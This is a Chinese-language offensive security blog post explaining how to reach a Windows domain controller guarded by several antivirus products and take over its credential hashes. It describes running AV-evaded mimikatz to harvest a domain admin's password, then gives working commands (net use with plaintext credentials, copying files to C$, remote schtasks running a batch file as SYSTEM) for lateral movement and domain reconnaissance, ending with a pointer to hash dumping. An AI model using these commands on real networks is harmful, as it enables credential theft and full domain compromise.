无需免杀获取域控hash小技巧

• 当前被控机器存在MS+诺顿，本来想直接利用出网机器+CS做个免杀然后一把梭，奈何域控环境有些苛刻：多个国际杀软+不出网，故而才有此文

前言

环境

• Microsoft Windows Server 2016 Standard
• Microsoft Security Essentials + Norton + Kaspersky
• Psexec 、WMIHACKER等都利用失败

对mimikatz进行免杀后抓取出网机器中的明文及Hash信息，恰好域管曾登录过这台机器,利用抓取到的域管信息去连接域控机器。

尽可能的减少动作，对psexec、WMIHACKER等常见方式进行利用发现均失败

故而使用被遗忘的技能

• net use及schtasks计划任务组合

测试过程

建立连接

net use \\192.168.42.8 /u:xsgcs\administrator xsgcs

查看目标开放的共享

net view \\192.168.42.8

只有域控才会有下面两个共享目录：

NETLOGON      Disk          Logon server share

SYSVOL        Disk          Logon server share

dir 命令

dir \\192.168.42.8\c$

删除连接

net use \\192.168.42.8 /del /y

copy 命令

• 将当前目录下的1.txt文件拷贝到域控机器

copy 1.txt \\192.168.42.8\c$

• 将域控机器上的xsgcs.txt拷贝到本地

copy \\192.168.42.8\c$\xsgcs.txt

type 命令

• 查看xsgcs.txt文件内容

type \\192.168.42.8\c$\xsgcs.txt

计划任务执行命令 高版本中at命令不适用

• 创建计划任务名为xsgcsschtasks /create /tn xsgcs /U xsgcs\administrator /P xsgcs /tr C:\Users\system.bat /sc ONSTART /s 192.168.42.8 /RU system
• 执行计划任务xsgcsschtasks /run /tn xsgcs /s 192.168.42.8 /U xsgcs\administrator /P xsgcs
• 删除计划任务xsgcsschtasks /F /delete /tn xsgcs /s 192.168.42.8 /U xsgcs\administrator /P xsgcs
• system.bat内容 此处举例说明

whoami >> c:\Users\1.txt
net user >> c:\Users\1.txt
systeminfo >> c:\Users\1.txt
tasklist /svc >> c:\Users\1.txt
net group "domain admins" /domain >> c:\Users\1.txt
net user /domain >> c:\Users\1.txt

也可进行自定义，将计划任务写入system.bat中执行

最后再按照我之前写的利用ProxyShell漏洞获取域控所有Hash文章里面导出域控hash的方式将命令替换到bat文件里面即可。

备注：

1.上传的任何文件都需要在前面添加绝对路径

2.如果当前路径无权限可尝试更换其他路径